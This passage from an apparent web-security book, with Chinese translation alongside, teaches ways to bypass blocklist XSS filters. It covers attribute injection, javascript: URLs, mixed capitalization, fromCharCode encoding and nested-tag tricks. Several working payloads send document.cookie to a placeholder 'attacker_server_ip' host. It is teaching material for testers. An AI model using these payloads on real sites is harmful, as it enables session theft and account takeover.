Question

Most applications now implement some sort of XSS protection in their input fields. Often, they’ll use a blocklist to filter out dangerous expressions that might be indicative of XSS. Here are some strategies for bypassing this type of protection.

大多数应用程序现在在其输入字段中实施某种 XSS 保护。通常，它们将使用块列表来过滤可能表明 XSS 的危险表达式。以下是规避这种保护的一些策略。

Alternative JavaScript Syntax

Often, applications will sanitize <script> tags in user input. If that is the case, try executing XSS that doesn’t use a <script> tag. For example, remember that in certain scenarios, you can specify JavaScript to run in other types of tags. When you try to construct an XSS payload, you can also try to insert code into HTML tag names or attributes instead. Say user input is passed into an HTML image tag, like this:

通常，应用程序会对用户输入中的<script>标签进行清理。如果是这种情况，请尝试执行不使用<script>标签的 XSS。例如，请记住，在某些情况下，您可以指定在其他类型的标记中运行 JavaScript。在尝试构造 XSS 有效载荷时，您也可以尝试将代码插入 HTML 标记名称或属性中。例如，假设用户输入被传递到 HTML 图像标记中，如下所示：

<img src="USER_INPUT">

Instead of closing out the image tag and inserting a script tag, like this

不要关闭图像标签并插入脚本标签，应该这样做：

<img src="    /><script>alert('XSS by Vickie');</script> "/>

you can insert the JavaScript code directly as an attribute to the current tag:

你可以把 JavaScript 代码直接作为当前标签的属性插入：

<img src="    123" onerror="alert('XSS by Vickie'); "/>

Another way of injecting code without the <script> tag is to use the special URL schemes mentioned before. This snippet will create a Click me! link that will generate an alert box when clicked:

另外一种在不使用<script>标签的情况下注入代码的方式是使用之前提到的特殊 URL 方案。以下代码片段将创建一个“点击我！”链接，单击后将生成一个警告框：

<a href="    javascript:alert('XSS by Vickie')>Click me!</a> "

Capitalization and Encoding

You can also mix different encodings and capitalizations to confuse the XSS filter. For example, if the filter filters for only the string "script" , capitalize certain letters in your payload. Since browsers often parse HTML code permissively and will allow for minor syntax issues like capitalization, this won’t affect how the script tag is interpreted:

你也可以混合不同的编码和大小写来迷惑 XSS 过滤器。例如，如果过滤器只过滤字符串"script"，则可以在负载中将某些字母大写。由于浏览器通常宽松解析 HTML 代码并允许大小写等小的语法问题，这不会影响脚本标记的解释方式。

<scrIPT>location='http://attacker_server_ip/c='+document.cookie;</scrIPT>

If the application filters special HTML characters, like single and double quotes, you can’t write any strings into your XSS payload directly. But you could try using the JavaScript fromCharCode() function, which maps numeric codes to the corresponding ASCII characters, to create the string you need. For example, this piece of code is equivalent to the string "http://attacker_server_ip/?c=" :

如果应用程序过滤特殊的 HTML 字符，比如单引号和双引号，你就不能直接将任何字符串写入 XSS 有效负载中。但是你可以尝试使用 JavaScript fromCharCode() 函数，将数字代码映射到相应的 ASCII 字符，来创建所需的字符串。例如，以下代码段等同于字符串"http://attacker_server_ip/?c="。

String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 97, 116, 116, 97, 99, 107,
101, 114, 95, 115, 101, 114, 118, 101, 114, 95, 105, 112, 47, 63, 99, 61)

This means you can construct an XSS payload without quotes, like this:

这意味着您可以构建一个没有引号的 XSS 载荷，如下所示：

<scrIPT>location=String.fromCharCode(104, 116, 116, 112, 58, 47, 
47, 97, 116, 116, 97, 99, 107, 101, 114, 95, 115, 101, 114, 118, 
101, 114, 95, 105, 112, 47, 63, 99, 61)+document.cookie;</scrIPT>

The String.fromCharCode() function returns a string, given an input list of ASCII character codes. You can use this piece of code to translate your exploit string to an ASCII number sequence by using an online JavaScript editor, like https://js.do/ , to run the JavaScript code or by saving it into an HTML file and loading it in your browser:

String.fromCharCode() 函数返回一个字符串，给定一个 ASCII 字符代码列表输入。您可以使用此代码段，通过使用在线 JavaScript 编辑器（如 https://js.do/）运行 JavaScript 代码或将其保存到 HTML 文件中并在浏览器中加载，将 exploit 字符串转换为 ASCII 数字序列。

<script>
1 function ascii(c){
  return c.charCodeAt();
}
2 encoded = "INPUT_STRING".split("").map(ascii);
3 document.write(encoded);
</script>

The ascii() function 1 converts characters to their ASCII numeric representation. We run each character in the input string through ascii() 2 . Finally, we write the translated string to the document 3 . Let’s translate the payload http://attacker_server_ip/?c= by using this code:

ascii（）函数将字符转换为它们的 ASCII 数字表示形式。我们将输入字符串中的每个字符通过 ascii（）函数运行。最后，我们将翻译后的字符串写入文件。使用此代码翻译有效负载 http://attacker_server_ip/？c =。

<script>
function ascii(c){
  return c.charCodeAt();
}
encoded = "    http://attacker_server_ip/?c= ".split("").map(ascii);
document.write(encoded);
</script>

This JavaScript code should print out "104, 116, 116, 112, 58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 95, 115, 101, 114, 118, 101, 114, 95, 105, 112, 47, 63, 99, 61" . You can then use it to construct your payload by using the fromCharCode() method.

这段 JavaScript 代码应该会打印出 "104, 116, 116, 112, 58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 95, 115, 101, 114, 118, 101, 114, 95, 105, 112, 47, 63, 99, 61"。然后，您可以使用 fromCharCode() 方法来构造有效载荷。

Filter Logic Errors

Finally, you could exploit any errors in the filter logic. For example, sometimes applications remove all <script> tags in the user input to prevent XSS, but do it only once. If that’s the case, you can use a payload like this:

最后，您可以利用过滤逻辑中的任何错误。例如，有时应用程序会删除用户输入中的所有<script>标签以防止 XSS，但只做一次。如果是这种情况，您可以使用此类有效负载：

<scrip<script>t>
location='http://attacker_server_ip/c='+document.cookie;
</scrip</script>t>

Notice that each <script> tag cuts another <script> tag in two. The filter won’t recognize those broken tags as legitimate, but once the filter removes the intact tags from this payload, the rendered input becomes a perfectly valid piece of JavaScript code:

请注意每个<script>标记都会将另一个<script>标记分成两个部分。过滤器不会将这些断裂的标记识别为合法标记，但一旦过滤器从这个有效载荷中移除完整的标记，渲染的输入就变成了一个完美有效的 JavaScript 代码。

<script>location='http://attacker_server_ip/c='+document.cookie;</script>

These are just a handful of the filter-bypass techniques that you can try. XSS protection is difficult to do right, and hackers are constantly coming up with new techniques to bypass protection. That’s why hackers are still constantly finding and exploiting XSS issues in the wild. For more filter-bypass ideas, check out OWASP’s XSS filter evasion cheat sheet ( https://owasp.org/www-community/xss-filter-evasion-cheatsheet ). You can also simply Google for XSS filter bypass for more interesting articles.

这些只是你可以尝试的规避过滤器技术的一小部分。正确执行 XSS 保护非常困难，而黑客不断想出新技术来规避保护。这就是为什么黑客仍在野外不断发现和利用 XSS 问题。要了解更多规避过滤器的想法，请查阅 OWASP 的 XSS 过滤器逃避秘籍（https://owasp.org/www-community/xss-filter-evasion-cheatsheet）。您还可以直接搜索 XSS 过滤器规避以获取更多有趣的文章。